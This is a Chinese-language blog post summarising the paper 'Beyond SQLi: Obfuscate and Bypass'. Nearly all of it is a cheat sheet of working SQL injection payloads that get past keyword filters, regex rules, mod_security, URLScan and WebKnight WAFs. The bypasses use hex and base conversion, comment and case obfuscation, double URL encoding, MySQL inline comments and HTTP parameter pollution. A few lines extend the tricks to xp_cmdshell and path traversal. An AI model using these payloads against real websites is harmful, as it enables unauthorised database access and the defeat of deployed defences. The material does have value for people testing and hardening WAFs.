Beyond SQLi: Obfuscate and Bypass簡譯

英文原文

繞過函數(shù)和關(guān)鍵字過濾

  1. and, or
Filtered injection:    1 or 1 = 1      1 and 1 = 1
Bypassed injection:    1 || 1 = 1      1 && 1 = 1
  1. and, or, union
    PHP filter code: preg_match('/(and|or|union)/i', $id)
    union查詢經(jīng)常用來爆數(shù)據(jù),被和諧了之后只能通過布爾方式注入了
Filtered injection: union select user, password from users
Bypassed injection:  1 || (select user from users where user_id = 1) = 'admin'
  1. and, or, union, where
    PHP filter code: preg_match('/(and|or|union|where)/i', $id)
    可以通過limit m,n定位是第幾條數(shù)據(jù)
    其中m是指記錄開始的index,從0開始,表示第一條記錄,n是指從第m+1條開始,取n條。
Filtered injection:  1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection:  1 || (select user from users limit 1) = 'admin'
  1. and, or, union, where, limit
    PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id) 
`group by`故名思意就是分組,一個id一個組。
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  1. and, or, union, where, limit, group by
    PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
    GROUP_CONCAT函數(shù)返回一個字符串結(jié)果,該結(jié)果由分組中的值連接組合而成。substr就是截取字符了。
Filtered injection:  1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
  1. and, or, union, where, limit, group by, select
    過濾代碼就省略了,跟上面相比多了個select
    into outfile導(dǎo)出結(jié)果到指定文件,前提是能夠訪問的到吧,而且都能這樣了還不如直接getshell?
    而且沒有了select之后,如果列名不在前面的查詢語句的表中就沒用了。
Filtered injection:    1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection:    1 || 1 = 1 into outfile 'result.txt'
Bypassed injection:    1 || substr(user,1,1) = 'a'
  1. and, or, union, where, limit, group by, select, 單引號
    多了個unhex(),16進(jìn)制的匹配
Filtered injection:    1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection:    1 || user_id is not null
Bypassed injection:    1 || substr(user,1,1) = 0x61
Bypassed injection:    1 || substr(user,1,1) = unhex(61)
  1. and, or, union, where, limit, group by, select, ', hex
    CONV(N,from_base,to_base) 該函數(shù)返回值N從from_base到to_base進(jìn)制轉(zhuǎn)換的字符串。最小基數(shù)值是2,最大值為36。
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
  1. and, or, union, where, limit, group by, select, ', hex, substr
    lpad(str,len,padstr) 返回字符串str,左填充用字符串padstr填補到len字符長度。 如果str為大于len長,返回值被縮短至len個字符(即,不能超過 len 長)。
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
  1. and, or, union, where, limit, group by, select, ', hex, substr, 空白符
Filtered injection:    1 || lpad(user,7,1)
Bypassed injection:    1%0b||%0blpad(user,7,1)

繞過正則過濾

PHPIDS 通常會干掉包含了 = or ( or ' 后面跟著數(shù)字或字符的例如 1 or 1=1, 1 or '1', 1 or char(97). 然而,it can be bypassed using a statement that does not contain =, ( or ' symbols.
會被干掉的:

1 union select 1, table_name from information_schema.tables where table_name = 'users'
1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)

可以繞過的

1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

繞過waf

  • 注釋符
    http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
  • 大小寫
    http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
  • 關(guān)鍵字替換
    http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
    插入空白符
    http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
    ps,如果碰到url重寫的話/**/是不能用的
    http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
    要換成%0b
    http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html
  • 雙重編碼
    http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

mod_security

SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"

繞過
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
我們看看發(fā)生了什么
mysql支持三種注釋符 #、-- 、/**/,這里還用了%0D%0A進(jìn)行換行
在waf看來,語句是這樣的

            0 div 1 union#foo*/*/bar
            select#foo
            1,2,current_user

在數(shù)據(jù)庫看來,語句是這樣的0 div 1 union select 1,2,current_user

  • 緩沖區(qū)溢出
    http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141 414141414141 .)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
  • 內(nèi)聯(lián)注釋(常見于過狗注入)
    http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
    http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables /*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

更高級的繞過方式

  • http參數(shù)污染(HTTP Parameter Pollution: Split and Join)
    http://victim.com/search.aspx?par1=val1&par1=val2
    簡單的說,對于waf取得值是val1,而對于web服務(wù)器取得的值是val2,亦或者是val1,val2的組合

    Web Server Parameter Interpretation Example
    ASP.NET/IIS Concatenation by comma par1=val1,val2
    ASP/IIS Concatenation by comma par1=val1,val2
    PHP/Apache The last param is resulting par1=val2
    JSP/Tomcat The first param is resulting par1=val1
    Perl/Apache The first param is resulting par1=val1
    DBMan Concatenation by two tildes par1=val1~~val2

bypass mod_security

這個url妥妥的會被攔截
http://victim.com/search.aspx?q=select name,password from users
用上參數(shù)污染就繞過了
http://victim.com/search.aspx?q=select name&q=password from users
waf眼中是這樣的

q=select name
q=password from users

iis眼中卻是這樣的q=select name,password from users

  • http參數(shù)污染2(HTTP Parameter Contamination)
    就是利用web服務(wù)器和waf對http請求的認(rèn)知的差異來繞過waf。

RFC 2396定義了這樣的東西
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved: ; / ? : @ & = + $ ,
Unwise: { } | \ ^ [ ] `

Query String Apache/2.2.16, PHP/5.3.3 IIS6/ASP
?test[1=2 test_1=2 test[1=2
?test=% test=% test=
?test%00=1 test=1 test=1
?test=1%001 NULL test=1
?test+d=1+2 test_d=1 2 test d=1 2
Keywords WAF ASP/ASP.NET
sele%ct * fr%om.. sele%ct * fr%om.. select * from..
;dr%op ta%ble xxx ;dr%op ta%ble xxx ;drop table xxx
<scr%ipt> <scr%ipt> <script>
<if%rame> <if%rame> <iframe>

asp和asp.net獨有的%號繞過

Keywords WAF ASP/ASP.NET
sele%ct * fr%om.. sele%ct * fr%om.. select * from..
;dr%op ta%ble xxx ;dr%op ta%ble xxx ;drop table xxx
<scr%ipt> <scr%ipt> <script>
<if%rame> <if%rame> <iframe>

bypass mod_security

Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell

bypass urlscan

Forbidden: http://localhost/test.asp?file=../bla.txt
Bypassed : http://localhost/test.asp?file=.%./bla.txt

Bypass AQTRONIX Webknight(也是360主機衛(wèi)士IIS版)

Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容